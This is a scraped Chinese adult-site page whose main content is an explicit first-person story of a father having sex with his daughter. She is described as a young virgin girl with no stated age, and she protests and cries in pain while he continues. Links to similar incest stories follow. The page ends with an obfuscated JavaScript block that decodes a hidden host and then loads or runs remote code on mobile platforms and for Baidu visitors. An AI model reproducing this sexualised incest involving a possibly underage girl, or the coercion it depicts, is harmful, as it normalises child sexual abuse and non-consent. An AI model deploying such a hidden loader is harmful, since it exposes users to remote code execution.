返回

射满了女儿的春水穴90a

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

我的女儿从小漂亮娇媚,天生的一双大眼睛就回放电,望着这个美丽又性感的少女,我的浓浓欲情又被激起,老二不知不觉的胀硬翘起来,虽然她是我女儿我还是无法控制,因为我女儿是一个千年难遇的龙珠春水穴。

有一天女儿刚从浴室出来,来,爸爸吻吻香不香,我闻着怀中少女的处子幽香,不禁心神一荡,一股热气从丹田涌了上来,想也不想便低下头,吻住了女儿的小嘴。

好滑腻啊!香香的、软软的、甜甜的。我的舌头灵巧的引诱着女儿的丁香小舌,贪婪的吮吸着女儿口中的蜜汁。我趁机把双手探入浴袍中,在女孩雪嫩的背臀间轻抚。

女儿害羞的本性使她觉得应该把浴衣整理好,可她怎么也舍不得离开爸爸的身体。

女儿,我会好好爱你的,相信我。

你,你坏,女儿娇呼,爸爸,不要,她两腿有点抖。

我将她的浴袍脱了下来,露出两条粉色似白的玉腿。搂着她,四片唇纠缠在一起。伸出舌头、顶开女儿的门牙,将舌头塞了进去,她也伸长了舌尖来迎,两条舌头互相撩拨不休!

我吞了几口女儿小嘴里的津液,甘甜的。

女儿赤裸的下体,不自主的扭了扭。

唔,不要!女儿呶着小嘴,粉脸绯红,我解开自己的裤带,要掏出自己最燥热的那根东西,我将裤子扔到一旁,露出毛茸茸,巨大的阳具…

女儿掩着自己跟睛,她想看又不敢看。

但,她的手更大胆。

喔,啊,女儿伸出玉手,握住了我的命根!

女儿媚叫起来,哇!又长了些,真妙,

她双手搓了搓我的阴茎,来,我给你亲一口!

女儿的手,握住我的大阴茎,两片热热的红唇,已碰上我紫红的龟头上。

唉呀,含着我的鸡巴的,是美少女,是女儿的小嘴啊,我不自觉的呻吟起来……

没有停止动作,她舌尖微伸,就舔落在我大龟头马眼上。

那根巨大的肉棍儿,昂得更高了。

唔,好香,女儿的双唇,咬着我的龟头,慢慢的啜了两啖,宝贝你真棒。她的媚眼看了我一眼,轻轻的又搓弄起来。

只见女儿转过了,如玉娇躯,四肢八爪鱼般地搂紧了我,我的双手托在女儿浑圆的玉臀下,将她的一双玉腿挂在肩头,那美妙的幽谷就这样彻底暴露在我眼下被摆布成这完全任君采撷的模样儿,女儿芳心里又羞又爱呀……

在她的脖子和肩膀上亲吻着,玩够了女儿的乳房,我又把手顺着女儿的身体向下滑到她的屁股上,轻轻捏着她那富有弹性的臀部,我不停的抽动着,肉棒在女儿的大腿内侧轻轻的摩擦,每一次我都会紧紧的打在女儿的屁股上,感受着她那弹性十足的小屁股。

感到乳峰上的小豆豆硬了起来,我低下头去用舌头用力的上下挑逗着它们,只见那两个小豆豆越来越硬了,我索性把嘴张开,用牙齿咬住女儿的乳峰,忘情的添着,就像是在吃着全世界最好吃的美味佳肴。

爸爸,我爱你,快…快疼我吧。注视着她的眼睛问,真的要做吗?小宝贝?,我把这千柔百顺、秀丽清纯的绝色佳人放下,抱起她柔若无骨、娇软如玉的胴体,放在床上。

我用力分开女儿紧夹的雪白玉腿,女儿娇羞无限地一点、一点地张开了修长优美的雪滑玉腿。我用手轻轻分开那细滑微卷的阴毛,巨大的阳具向秀丽清纯的绝色少女的下身压下去。

我先把龟头慢慢督进那紧闭滑嫩的两瓣阴唇中,大龟头沾着了湿润的淫水,顺势滑进那嫣红娇小的可爱的阴道口,然后一点一点地顶进去,直到女儿那娇小紧窄的阴道完全紧紧地箍住了我巨大的阳物。

宝贝,我进来了,可能会有点疼。

进去了…啊…快点…我受不了了…,不觉下半身肌肉紧绷,啊……一声火热而娇羞的轻啼从女儿小巧鲜美的嫣红樱唇发出,开始了处女的第一次含羞叫床。啊,女儿要被我破瓜了……我是个禽兽老爸啊……我要用自己的大鸡巴破女儿的处,干她的小鸡掰了……我真的兴奋死了……

女儿的小穴把我的龟头夹得紧紧的,我继续向前推进着,突然碰到了阻碍,我知道我的大肉棒已经顶在女儿的处女膜上面了………

我打算要突破这层障碍,女儿的贞操就快是我这个当老爸的了,看着女儿那张美丽的脸蛋,一头乌黑的长发,还有苗条的身体,现在更是毫无保留的在我的眼前一览无余,我真是感谢上帝赐予了我这样一个美丽而年轻的女儿。

我的大肉棒何等粗壮,虽说她的幽谷竟能完完全全地吞入了它,却也是贴得紧紧的,再没有一点点间隙了。

感觉到身下的绝色美女虽是疼痛的夹紧了,幽谷当中却是温柔地啜吸着它,完全没有一点紧夹的疼痛感,反而更能感觉到肉欲交融的紧贴美妙,我也不由得震惊了,我搞过的处女不在少数,却从没有人能在刚破瓜时,体内就能如此美妙的紧夹啜吸,就好像已乐在其中似的,真是跟她妈妈当年在大学宿舍被我干穴时一模一样啊……

我俯下头去吻住了女儿微启的樱唇,双手温柔地在女儿的乳上搓揉抚爱,肉棒则随着腰部微不可见的扭动,缓慢而温柔地在女儿的幽谷中滑动着。

我双手抓住女儿的大腿向两边分开,用肉棒使劲向里面顶。

啊,好爽啊……女儿的小穴真是太紧了!

我的肉棒很顺利的一点一点向里面插进去,突然,我的龟头感觉顶到了什么东西,不用想都知道是女儿的处女膜了。肉棒再次向里面一顶,又一次的打在了女儿的处女膜上,居然这次还是没有顶破!

龟头上的快感让我完全停不下来,我已经顾不了这么多了,腰部再次狠狠使上力气,一下子顶破了女儿的处女膜,向更深处插入。

啊……在绝色美貌的纯情处女的柳眉轻皱、娇啼婉转声中,我的下身再向前一送,巨硕粗圆的龟头已刺破女儿作为清纯处女最后一道证明的处女膜了。她再也不是处女了,而是被禽兽老爸蹂躏、玷污过了的少女了……

……啊……啊……痛……好痛啊……嗯……

女儿秀眉一皱,一阵娇羞地轻啼,美眸含泪,只见女儿下身那洁白的床单上处女落红点点。

哦——啊——啊!好紧啊!

对!现在热呼呼的大肉棒要贯穿进去了!那可怜的小花苞里,青筋暴露的棒身正在耀武扬威。

大肉棒正一分一毫的挺进,但似乎太粗大了,无法整个容纳下去,少女痛的哭叫出声,我暂时放松了大肉棒的进击,女儿媚眼微张,小嘴吐气如幽兰,眼睁睁看着我这个禽兽老爸如何对她破处奸淫……

在她放松的一瞬间我顶了进去,在她还没意识到怎么回事,想夹紧双腿时我已进去了,她身体扭了一下,我吸了一口气腰部猛用力使劲往里顶,她惊叫一声像身体撕裂般地哼了一声双手紧紧拽住了床沿。我稍稍停了一会,然后慢慢在里面动,她咬着牙关,泪水在眼眶里闪烁,是少女贞操被夺去的眼泪啊……还是被兽父奸淫乱伦的快感喜悦呢?

我只感到一股股潮水般的热量包裹了我的身体,我开始抽插,她的僵硬的身体渐渐放松了,她的身体紧紧抽吸着,一种力量把我好像引到无垠的深渊,她的花心吸住我,一股巨大的热流从脑后向下滑行,令人惊悸的快感流遍全身,突然像泻水的水库,我顶到了她身体里面发软软的,好像一个海绵的大洞,所有潮水般的洪流直接灌进了海绵的洞中间。

我们同时死死搂紧了对方。被大阳具刺得落红片片,也被刺得娇啼婉转、欲仙欲死,清纯秀丽、美貌绝色的俏佳人被我这样一阵巨棒活塞挑逗,女儿细细轻喘,含羞迎合,一双优美雪滑的修长玉腿和柔若无骨、娇软如柳的纤纤细腰又挺又夹,羞涩地配合着,把那硬硕的阳具迎入自己火热幽深的花房。

她的双腿被我掰到几乎成一字马,却一点儿也没叫苦叫痛。

她的肉屄则异乎寻常地凸突,我把阴茎插进时,就不会被她的大腿所夹撑,不但可以尽根而入,撞击到她的大阴唇时,还像软垫一般得到缓冲……

哇!好紧。

不…不要…够了…爸爸…轻…啊…轻一点。

哦,好像…插进子宫里…去了…

小女儿俏脸羞红,粉脸含春,忍痛迎合,含羞承欢爸爸用滚烫梆硬的龟头连连轻顶那娇滑稚嫩、含羞带怯的处女阴核,大概抽送了三十几下后,我感到女儿的阴道内已经足够湿润了。

我的双手放开女儿的大腿,撑在床上,腰部一用力,很顺利的把肉棒全部插了进去,我的龟头狠狠的顶在了女儿的花心上面,感到花心都被我的肉棒顶得向两边分开,似乎都已经顶到了女儿的子宫。

忽然从女儿口中发出了声音女儿娇羞的粉脸胀得通红,被这样连连的顶触撞炮,根本是欲仙欲死,娇呻艳吟着,女儿淫屄已经搔痒难耐了,用力将插在桃花洞的肉棒夹紧。

女儿那紧紧箍住我大阳具的两片嫣红可爱的阴唇花壁,随着阳具的抽出、顶入而轻吐、纳入抽插开始更加有力起来,一下一下直抵女儿火热柔软的阴道深处,我在女儿一丝不挂的雪白玉体上一起一伏地撞击着,像在打洞,要把这神秘花心幽谷肏烂一般地狠命地干……

女儿早已娇躯酸软无力,玉背靠着墙壁,一双雪藕似的玉臂紧紧攀着他的双肩,雪白柔软的平滑小腹用力向前挺送迎合,美眸含羞轻合,丽,娇晕羞红。

我喘着粗气,一下比一下用力地向这个千柔百媚、绝色清纯的绝色丽人的女儿阴道深处顶着、插着。

啊……一声淫媚入骨的娇喘,女儿那早已淫滑不堪的阴道玉壁一阵痉挛、紧夹,玉壁内的粘膜嫩肉火热地紧紧缠绕在粗大的肉棒上,男人巨大的肉棒插在女儿阴道中本就觉得紧窄娇小异常,再给她在高潮中阴道玉壁的这一阵缠绕收缩、紧夹吮吸,我扶起她的细腰将双臀抬高,看着阴茎从蜜桃中间拚命的抽插,寻求最后的高潮……

她将双腿高高的缠着我的腰,只见女儿裸卧眼前,给仅靠一只手就顶住了她的腰,让她下身整个悬空,只有背心靠在地上,另一手刚紧紧握住了女儿那娇媚跳动的玉乳,有力地搓揉挤压,女儿似已经被欲火完全烧化了,星眸迷茫如雾、香肌晕红若火,那双修长的雪白玉腿紧箍在我的腰间,随着托住她腰间的手来回辅助,热情地挺动纤腰,好让那可怜的小穴承受着一下比一下更凶猛激烈的冲击。

我此刻似发狂一般地插着女儿的多汁蜜穴,连抓着她玉乳的手也愈来愈用力,在女儿纤细雪白的肌肤上留下了丝丝红痕,猛烈的像是想要把身下这娇媚绝艳的女儿弄伤弄死似的,偏偏天仙一般的女儿像是一点都感觉不到痛,那断断续续的娇媚呼声,混在她急促的喘息声中,她所承受的高潮冲击之美妙之畅。

突然,女儿玉体一阵电击般的酸麻,幽深火热的湿滑阴道膣壁内,娇嫩淫滑的粘膜嫩肉紧紧地箍夹住那火热抽动的巨大阳具一阵不由自主地、难言而美妙的收缩、夹紧,射出了一股滚烫的又粘又稠、又滑又腻的玉女阴精。

女儿的子宫花蕊内射出了股宝贵的处女阴精,我…已经…啊…到了极限了…丢…丢了!少女修长玉滑的雪白美腿猛地扬起、僵直,也从幽暗、深遽的子宫内射出了一股粘稠滑腻的宝贵的处女阴精,哎……啊……小女娇,羞红,玉颊生晕,楚楚含羞地娇啼狂喘。

啊…好棒…好像在里面跳舞一样…好舒服…啊…你可以出来了…全都射出来…嗯…求求你,不要射进里面,不要…呀……别、别射在里面……她嘴上这么说着,但是我大叫一声,噢!狠狠地把龟头已一下子插到阴道的深处,喷出一大蓬浓浊的白液,那乱伦的精液已经射出,而且都射在女儿小穴里面。

我对女儿特别怜爱,故意暗运全力,把那一股股精子喷得更远更深,直要把整个子宫填得江河满载,誓要令女儿怀有自己的骨肉。

即使精液已倒灌得从阴道口中挤压了出来,我的大阴茎还像唧筒般一下一下的把精液源源不绝地喷出,女儿的子宫亦随着精液的喷出,相应地张开吸纳,将爸爸所有精液毫不遗留的接收,阴壁亦收缩蠕动,将挤出外精液亦尽量吸运回来,直至爸爸阴茎收缩变软,子宫收缩,阴壁才停止了蠕动。

女儿着急的说,老天!你射在我里面……

她有一点生气,我抱歉的说,对不起,我忍不住,你太美了!

涨的我下面到现在还有些疼。

我有些心疼的去按摩她的下面。

对不起哦!爸爸不是故意的

宝贝,舒服吗?我揉捏着女儿的小屁股。嗯。女儿羞答答地道:嗯……,你……你……进……进去得……好……好深……。

娇羞无限地低垂下雪白优美的粉颈,把一具洁白耀眼、柔若无骨、一丝不挂、雪白美丽的圣洁玉体埋进我的怀中。

鼻中闻到美人那香汗淋漓的如兰气息,邪恶的淫欲又一次死灰复燃。

从云交雨合的高潮中滑落下来正娇喘细细、娇羞万般的女儿忽然感到那本来顶在自己的阴道口,泡在淫滑湿润的爱液中已萎缩的肉棒一动,又渐渐抬头挺胸。

再把她身体挪成侧卧的姿势,双膝跪在床面,上身一挺高,便把她两条大腿撑成一字马,阴户被掰得向两边大张。

淫水由于两片小阴唇的分离,便被拉出好几条透明的黏丝,像蜘蛛网般封满在阴道口上。他一手按着肩上的大腿,一手提着发烫的阴茎,破网再向这“盘丝洞”里插进。不知是他经常游泳,腰力特别强,还是这姿势容易发劲,总之每一下抽送都鞭鞭有力,啪啪作响,每一下都深入洞穴,直顶尽头阳具一顶到底,上翘的龟头直入花心。

花心喇叭口迅即闭合,紧紧唆含住入侵的龟头;层层湿暖的嫩肉,不停的挤压、研磨着龟头;而嫩肉中隐藏的龙珠,亦不时的旋来转去,刮擦凸起的肉菱;那种舒服畅快的感觉,真是无法言喻……

花心至今始遭玉茎初探的女儿,整个人几乎舒服的晕了过去;无限的快感排山倒海而来,体内就如同火炉点燃一般,烧得她全身不停的颤栗抖动。

暴凸的肉菱,像是刮到了她的心坎,又酥又痒,又麻又酸,就如同触电一般。一股酥酥痒痒的暖流,由下体深处,缓缓升起;椎心蚀骨,回肠荡气的愉悦也随即来临她自觉高潮一浪接一浪的来回不停,就好像在湖面抛下了一颗石头,层层涟漪以小屄为中心点,向外不断地扩散出去。

整个人就在这波滔起伏的浪潮中浮浮沉沉,淹个没顶。女儿只觉阴茎一点一点的深入自己滑润的阴道,感觉好像是在往她阴道里塞进-根红热的铁棒,又烫又痒,说不出的舒服涌向心头。

慢慢地她周身的血液开始沸腾起来,甚至感觉有些眩晕,那根粗大的阴茎在张着口的阴道里停止了前进,她那像樱桃似的小嘴微微的张看,脸上显出了一种快乐舒畅的样子。

胯下肉棒被一层层温暖紧实的嫩肉给紧紧的缠绕住,尤其是洞口那种紧箍的程度有如要将肉棒给夹断似的尤其是这种姿势更能让肉棒深入,只觉一根肉棒如生了根般死死的顶住秘洞深处。

好……好舒服……我……我泄了……我完了……两手死命的抓着我的肩头,一双修长美腿更是紧紧的夹缠着我的腰部,浑身急遽抖颤,秘洞嫩肉一阵强力的收缩夹紧,好像要把大肉棒给夹断般,秘洞深处更紧咬着肉棒顶端不住的吸吮,吸的我只觉浑身急抖,真有说不出的酥爽啊,这就是美少女乖女儿的小淫屄、小浪穴啊……

我反守为攻,将娇嫩无力的女儿身体翻转,由背后再将大鸡巴深深的插进蜜穴,那随着鸡巴插入淫穴,淫水喷溅噗嗤一声,女儿娇呼唉叫,那被爸爸干进去的穴儿真爽啊。

我亲吻着她的耳根、面颊。下面的鸡巴打洞机抽插也愈来愈快,也愈来愈形猛烈,我疯狂抽插,次次都撞入花心,强烈的高潮,使得原本抬起的屁股更高高挺起,雪白的下体一阵颤抖后,跌落在床上,女儿娇躯也不禁阵阵的颠抖。

蜜穴整个肉壁都在颤抖,包裹着我的大肉棒不停的蠕动,让我又一次体验到龙珠春水穴的柔情和威力,突地一股火热的洪流奔腾而出,大量强劲的精液,再度涓滴不漏的尽数射进她的花心,龙珠春水穴”的妙处,此时彻底发挥,那喇叭状的花心,紧裹龟头,阳精一滴不露的,尽行吸入花心。

一会阴阳交泰,花心复行蠕动,一股清凉的阴精,循着龟头马眼直透而入。女儿只觉下腹深处,如同火山爆发一般,快感向四处不断的扩散蔓延;她不由自主的,发出希斯底里的狂乱嘶叫……女儿挨插的浪吟娇呼真是天籁啊……

我巨大的龟头,紧顶花心,暴凸的肉菱,也不断搔刮她娇嫩的肉壁。

阳精和阴精同时喷出,那股阴阳交泰的快感,使她双腿高翘,身体一下子在女儿的身体里爆炸开来了,然后就是感到有无数只温柔快乐的小手,在我的身上爬动,抚摸着在一阵经挛狂抖后,我完全酥瘫在女儿的怀里。

女儿感觉到我的精液,再次灌满她的嫩穴。我乱伦的种子射满了她,我淫荡的女儿。

她这次不再埋怨我射在她里面,我们疲倦的相拥而睡。

评分
相关推荐
3.0分

3.0分 满满精液全射进了小穴933

3.0分

3.0分 内射小穴淫水满天飞fac

3.0分

3.0分 精子射进女儿的小嫩穴59e

3.0分

3.0分 射向青春小穴的深处e43

3.0分

3.0分 精液射满嫂嫂的小穴501

3.0分

3.0分 我的精子射进女儿的小嫩穴f22

3.0分

3.0分 射向青春小穴的深处完51b

3.0分

3.0分 征服女儿的穴穴3e2

3.0分

3.0分 女儿的骚穴f9e

3.0分

3.0分 大嫂丰满的穴穴a3f


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};